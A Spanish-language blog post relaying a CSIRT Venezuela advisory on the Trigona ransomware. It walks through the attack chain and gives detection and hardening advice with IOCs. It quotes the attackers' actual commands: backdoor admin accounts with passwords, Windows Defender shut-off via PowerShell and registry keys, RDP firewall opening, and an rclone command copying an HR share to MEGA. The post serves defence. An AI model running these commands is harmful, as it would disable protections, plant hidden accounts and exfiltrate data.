El CSIRT Venezuela ha emitido un comunicado con algunos consejos relacionados con la prevención al Ransomware TRIGONA, el cual está afectando notablemente a múltiples empresa la de la región.
Para ello el recién creado CSIRT emitió el comunicado Nro 001 con los siguientes consejos:
1.- Acceso inicial: En múltiples casos se ha observado accesos iniciales desde RDP expuestos en internet, y se puede confirmar haciendo un monitoreo en los event logs de windows ID 4624 y ID 4778
2.- Execution: Trigona dropea múltipes archivos en diferentes rutas del S.O, pero tiene la particularidad de no todos los ejecuta y sirven para despitar a los analistas e investigadores.
Rutas:
- C:\users\administrator\Music\Start\xxx.bat
- C:\Allibraries\start\xxx.bat
- C:\users\administrator\Music\Build_redacted.exe
Cabe destacar que estos archivos se ejecutan desde cmd y powershell (command line)
- C:\windows\system32\cmd.exe /c C:\users\administrator\Music\Start\xxx.bat
- C:\windows\system32\cmd.exe /c C:\Allibraries\start\xxx.bat
3.- Persistencia: Normalmente dropea un .bat llamado "newuser.bat" para crear usuarios admin dentro del equipo victima usando command line WMIC
User:sys / password: Taken1918
comando ejecutado:
- net user sys Taken1918 /add
- net localgroup "%RDPGroup%" sys /add
En un segundo script llamado newnewuser.bat crea otro usuario y agrega una clave en el regsitro de windows
user: Support / password: Kawa72ws
Adjunto el script:
- bks -ipl iplist.txt -cmd "cmd.exe /c net user Support Kawa72ws /add
- net localgroup Administrators Support /add & net localgroup \"Remote Desktop Users\" Support /add
- net accounts /maxpwage:unlimited
- reg add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\" /t REG_DWORD /f /d 0 /v Support"
En tercer lugar crea un nuevo valor en el registro de windows:
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run 26A725A082D4A783E9A908F891A93DD8
4.- Escalación de privilegios: En algunas muestras, se evidenció que logró acceso a usuarios administradores del S.O, esto se puede confirmar buscando el event log ID 4627 y monitoreando los SID de las membresias de grupos de windows.
5.- Evasión de defensa: Durante la cadena de ataque se detectó un script DefensorOFF.bat que desactiva diferentes servicios del S.O
Por ejemplo:
- taskkill /F /IM MSASCuiL.exe
- powershell Set-MpPreference -DisableRealtimeMonitoring $true
- powershell Set-MpPreference -MAPSReporting 0
- REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAHealth" /t REG_DWORD /d 0x1 /f
- REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 0x1 /f
- REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 0x1 /f
6.- Discovery: El adversario usa comandos desde powershell para hacer ciertos descubrimientos en windows.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
--> "C:\Windows\system32\net.exe" group /domain
--> "C:\Windows\system32\net.exe" group "domain admins" /domain
--> "C:\Windows\system32\whoami.exe"
También se evidencia la descarga de un archivo llamado netscan.xml para usar la herramienta llamada "Nestcan"
con un nivel de customización interesante donde incluso instala el componente PSEXEC.exe
7.- Movimientos laterales: El atacante usa un script llamado openrdp.bat para activar controles RDP y poder moverse dentro de la red.
- netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow
- netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
- reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
8.- Comando y control: El actor usa la IP 77.83.36[.]6 para conectarse vía RDP hacia su victima y luego de un par de horas se conecta desde otra IP 193.106.31[.]9
9.- Exfiltración: El actor de amenaza usa rclone.exe para poder exfiltra información hacia mega.io con este command line
- cmd /c "C:\Users\Administrator\Music\start — копия.bat"
--> cd %~dp0
--> rclone.exe copy "\\[FILE SERVER]\human resources" MEGA:domain -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
10.- Impact: Cifra archivos dentro del S.O y la nota de rescate la dropea con extensión .hta
11.- Dejo algunos IOCs analizados en una muestra:
- 77.83.36.6
- 193.106.31.98
- d743daa22fdf4313a10da027b034c603eda255be037cb45b28faea23114d3b8a
- d6d8302d8db7f17aaa45059b60eb8de33166c95d1d833ca4d5061201e4737009
- 12f838b54c6dac78f348828fe34f04ac355fa8cc24f8d7c7171d310767463c6c
- 40fe2564e34168bf5470bbe0247bc614117334753a107b2baeb113154b4de6a7
- 277550c9d5771a13b65e90f5655150e365516215a714ffd3f075b5b426e2ddc1
- 35ff76d763714812486a2f6ad656d124f3fcdfc4d16d49df6221325c8ae8827a
- 7f7e61246445872aec37808a2c20f5f055fb5fba8bd3f5af5194762114700180
- 0596b08f0f4c6526b568fc7c9d55abd95230a48feb07b67482392d31c40f3aea
- 56b08aa03bd8c0ea094cfeb03d5954ffd857bac42df929dc835eea62f32b09e0
- 54586ffce0dcb658de916cc46539b5a1e564aaa72be2620fc4f9133ca54aba64
- 18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566
- 8cf27e05e639fcc273d3cceadf68e69573b58e74b4bfce8460a418366a782fbd
- 8834c84cfd7e086f74a2ffa5b14ced2c039d78feda4bad610aba1c6bb4a6ce7f
- 6afb934834b97221dee10cbf97741c5fe058730460bfdbcf1da206758a296178
- 8b5fdb358b26c09a01c56de4de69841c67051f64ac8afcdd56dfddee06fdaa7b
12.- Consideraciones:
- La revisión de servicios expuestos a internet.
- Blindar y/o desactivar conexiones RDP.
- Monitorear la ejecución de procesos desde directorios no convencionales.
- Monitoreo constante de event log ID 4624 y ID 4778 y ID 4627.
- Monitorear ejecuciones de powershell y CMD sospechosas.
- Cerrar el trafico y permitir solo trafico legitimo.
- Bloquear los IOCs.
- Crear reglas de correlación en SIEM y XDR (en caso de que no existan).
- Desactivar usuarios locales y administradores .
- Monitorear cambios en el registro de windows .
Nota:
Este es el análisis de un ataque TRIGONA, cabe destacar que algunos IOCs pueden cambiar pero todo esto puede servir para generar mecanismos de detección y protección más eficientes.
Análisis elaborado por:
Ing Enzo Manzanares
Gerente Operaciones CSIRT Venezuela
No hay comentarios.:
Publicar un comentario